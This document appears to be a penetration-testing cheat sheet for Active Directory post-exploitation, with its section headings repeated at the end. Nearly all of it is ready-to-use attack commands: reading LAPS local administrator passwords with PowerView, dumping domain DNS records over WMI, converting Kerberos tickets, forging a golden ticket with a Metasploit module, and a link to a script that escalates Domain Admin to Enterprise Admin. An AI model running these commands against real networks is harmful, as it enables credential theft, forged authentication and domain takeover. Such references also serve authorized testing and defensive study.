AD Post-Exploitation

Dump LAPS password

Powerview

Get-DomainComputer <COMPUTERNAME|wks*> -Properties samaccountname,ms-mcs-admpwd

Dump DNS records

info

Wmi version compatible with old DC (can be adapted with wmic.exe if powershell not installed).

Records will be UTF-16 encoded so run the command below.

dos2unix raw_records.txt

On the DC run the following commands.

Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT TextRepresentation FROM MicrosoftDNS_AType WHERE ContainerName='<fqdn_domain>'" | fl > raw_records.txt

powershell Get-WmiObject -Class MicrosoftDNS_AType -NameSpace Root\MicrosoftDNS -ComputerName <DC> -Filter "DomainName = '<fqdn_domain>' AND TimeStamp=0" | fl > raw_records.txt

Optional formating

cat raw_records.txt | grep TextRepresentation | cut -d " " -f 3,6 > a_records.txt 

DC event auditing

auditpol /get /category:*

Ticket

Ticket converter

info

Convert ccache tickets into kirbi (KRB-CRED) and vice versa.

https://github.com/Zer1t0/ticket_converter

From raw to base64

cat <ticket.raw> | sed s'| ||'g | sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/ /g' | base64 -D >> <ticket.b64>

Golden Ticket

Standard Golden

golden_ticket_create -d <domain> -g <relative identifier> -k <hash> -s <SID> -u <user> -t /tmp/golden.tck

post/windows/escalate/golden_ticket

Domain Administrator to Entreprise Administrator

https://raw.githubusercontent.com/vletoux/MakeMeEnterpriseAdmin/master/MakeMeEnterpriseAdmin.ps1

Dump LAPS password​

Powerview​

Dump DNS records​

DC event auditing​

Ticket​

Ticket converter​

Golden Ticket​